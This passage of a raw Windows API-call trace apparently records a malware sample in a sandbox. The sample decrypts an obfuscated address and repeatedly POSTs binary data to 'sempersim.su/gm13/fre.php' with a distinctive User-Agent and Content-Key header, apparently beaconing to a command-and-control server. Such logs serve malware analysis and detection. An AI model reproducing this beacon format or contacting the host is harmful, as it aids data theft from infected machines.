0x620000 [0173.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0173.795] send (s=0x328, buf=0x63a880*, len=237, flags=0) returned 237 [0173.796] send (s=0x328, buf=0x6421e0*, len=159, flags=0) returned 159 [0173.796] GetProcessHeap () returned 0x620000 [0173.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644d68 [0173.796] recv (in: s=0x328, buf=0x644d68, len=4048, flags=0 | out: buf=0x644d68*) returned 237 [0175.446] GetProcessHeap () returned 0x620000 [0175.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0175.447] GetProcessHeap () returned 0x620000 [0175.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0175.448] GetProcessHeap () returned 0x620000 [0175.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0175.449] GetProcessHeap () returned 0x620000 [0175.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0175.449] closesocket (s=0x328) returned 0 [0175.451] GetProcessHeap () returned 0x620000 [0175.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b670 | out: hHeap=0x620000) returned 1 [0175.451] GetProcessHeap () returned 0x620000 [0175.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x628a78 | out: hHeap=0x620000) returned 1 [0175.452] GetProcessHeap () returned 0x620000 [0175.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0175.452] GetProcessHeap () returned 0x620000 [0175.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0175.453] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644d68, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1340) returned 0x328 [0175.455] Sleep (dwMilliseconds=0xea60) [0175.466] GetProcessHeap () returned 0x620000 [0175.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643008 [0175.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.467] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.478] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0175.490] GetProcessHeap () returned 0x620000 [0175.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0175.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.491] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0175.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.492] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.493] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.493] GetProcessHeap () returned 0x620000 [0175.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0175.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.494] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643008, pdwDataLen=0x19fcfc | out: pbData=0x643008, pdwDataLen=0x19fcfc) returned 1 [0175.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.543] CryptDestroyKey (hKey=0x62d710) returned 1 [0175.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.545] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0175.545] GetProcessHeap () returned 0x620000 [0175.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0175.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0175.546] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0175.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0175.547] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0175.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0175.548] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0175.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0175.549] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0175.549] GetProcessHeap () returned 0x620000 [0175.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0175.550] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0175.550] GetProcessHeap () returned 0x620000 [0175.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0175.550] GetProcessHeap () returned 0x620000 [0175.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0175.551] GetProcessHeap () returned 0x620000 [0175.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643008 | out: hHeap=0x620000) returned 1 [0175.551] GetProcessHeap () returned 0x620000 [0175.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0175.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.552] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.564] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0175.571] GetProcessHeap () returned 0x620000 [0175.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0175.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.572] CryptImportKey (in: hProv=0x63ba08, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0175.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.576] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.577] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.577] GetProcessHeap () returned 0x620000 [0175.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0175.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.580] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0175.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.582] CryptDestroyKey (hKey=0x62d710) returned 1 [0175.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0175.584] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0175.584] GetProcessHeap () returned 0x620000 [0175.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0175.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0175.585] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0175.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0175.586] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0175.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0175.587] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0175.587] GetProcessHeap () returned 0x620000 [0175.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0175.587] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644720*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0175.593] GetProcessHeap () returned 0x620000 [0175.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0175.593] socket (af=2, type=1, protocol=6) returned 0x32c [0175.593] connect (s=0x32c, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0175.645] FreeAddrInfoW (pAddrInfo=0x644720*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0175.645] GetProcessHeap () returned 0x620000 [0175.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0175.645] GetProcessHeap () returned 0x620000 [0175.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644d68 [0175.646] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0175.647] wvsprintfA (in: param_1=0x644d68, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0175.647] GetProcessHeap () returned 0x620000 [0175.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0175.647] GetProcessHeap () returned 0x620000 [0175.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0175.648] GetProcessHeap () returned 0x620000 [0175.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6434d0 [0175.648] GetProcessHeap () returned 0x620000 [0175.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644d68 [0175.649] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0175.649] wvsprintfA (in: param_1=0x644d68, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0175.650] GetProcessHeap () returned 0x620000 [0175.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0175.650] GetProcessHeap () returned 0x620000 [0175.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0175.650] send (s=0x32c, buf=0x63a880*, len=237, flags=0) returned 237 [0175.652] send (s=0x32c, buf=0x6421e0*, len=159, flags=0) returned 159 [0175.652] GetProcessHeap () returned 0x620000 [0175.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644d68 [0175.652] recv (in: s=0x32c, buf=0x644d68, len=4048, flags=0 | out: buf=0x644d68*) returned 237 [0177.301] GetProcessHeap () returned 0x620000 [0177.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0177.302] GetProcessHeap () returned 0x620000 [0177.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0177.302] GetProcessHeap () returned 0x620000 [0177.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0177.303] GetProcessHeap () returned 0x620000 [0177.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0177.303] closesocket (s=0x32c) returned 0 [0177.304] GetProcessHeap () returned 0x620000 [0177.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0177.304] GetProcessHeap () returned 0x620000 [0177.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0177.305] GetProcessHeap () returned 0x620000 [0177.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0177.305] GetProcessHeap () returned 0x620000 [0177.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0177.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644d68, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1348) returned 0x32c [0177.309] Sleep (dwMilliseconds=0xea60) [0177.328] GetProcessHeap () returned 0x620000 [0177.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0177.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.331] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0177.353] GetProcessHeap () returned 0x620000 [0177.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0177.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.358] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0177.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.359] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.360] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.360] GetProcessHeap () returned 0x620000 [0177.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0177.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.361] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0177.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.362] CryptDestroyKey (hKey=0x62d710) returned 1 [0177.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.363] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0177.363] GetProcessHeap () returned 0x620000 [0177.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0177.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0177.364] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0177.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0177.365] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0177.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0177.366] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0177.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0177.367] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0177.367] GetProcessHeap () returned 0x620000 [0177.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0177.368] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0177.368] GetProcessHeap () returned 0x620000 [0177.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0177.368] GetProcessHeap () returned 0x620000 [0177.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0177.369] GetProcessHeap () returned 0x620000 [0177.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0177.369] GetProcessHeap () returned 0x620000 [0177.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0177.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.379] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0177.390] GetProcessHeap () returned 0x620000 [0177.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0177.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.391] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0177.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.392] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.393] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.393] GetProcessHeap () returned 0x620000 [0177.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0177.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.395] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0177.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.396] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0177.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0177.397] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0177.397] GetProcessHeap () returned 0x620000 [0177.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0177.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0177.398] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0177.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0177.399] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0177.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0177.400] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0177.400] GetProcessHeap () returned 0x620000 [0177.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0177.400] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644ba8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0177.406] GetProcessHeap () returned 0x620000 [0177.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b520 [0177.406] socket (af=2, type=1, protocol=6) returned 0x330 [0177.406] connect (s=0x330, name=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0177.463] FreeAddrInfoW (pAddrInfo=0x644ba8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0177.463] GetProcessHeap () returned 0x620000 [0177.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0177.463] GetProcessHeap () returned 0x620000 [0177.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644d68 [0177.464] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0177.465] wvsprintfA (in: param_1=0x644d68, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0177.465] GetProcessHeap () returned 0x620000 [0177.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0177.465] GetProcessHeap () returned 0x620000 [0177.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0177.466] GetProcessHeap () returned 0x620000 [0177.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643200 [0177.466] GetProcessHeap () returned 0x620000 [0177.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644d68 [0177.466] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0177.467] wvsprintfA (in: param_1=0x644d68, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0177.467] GetProcessHeap () returned 0x620000 [0177.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0177.467] GetProcessHeap () returned 0x620000 [0177.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0177.468] send (s=0x330, buf=0x63a880*, len=237, flags=0) returned 237 [0177.469] send (s=0x330, buf=0x6421e0*, len=159, flags=0) returned 159 [0177.469] GetProcessHeap () returned 0x620000 [0177.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644d68 [0177.469] recv (in: s=0x330, buf=0x644d68, len=4048, flags=0 | out: buf=0x644d68*) returned 237 [0179.225] GetProcessHeap () returned 0x620000 [0179.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0179.226] GetProcessHeap () returned 0x620000 [0179.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0179.226] GetProcessHeap () returned 0x620000 [0179.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0179.226] GetProcessHeap () returned 0x620000 [0179.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0179.226] closesocket (s=0x330) returned 0 [0179.228] GetProcessHeap () returned 0x620000 [0179.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b520 | out: hHeap=0x620000) returned 1 [0179.228] GetProcessHeap () returned 0x620000 [0179.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0179.228] GetProcessHeap () returned 0x620000 [0179.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0179.228] GetProcessHeap () returned 0x620000 [0179.228] HeapFree (in: hHeap=0x620000, 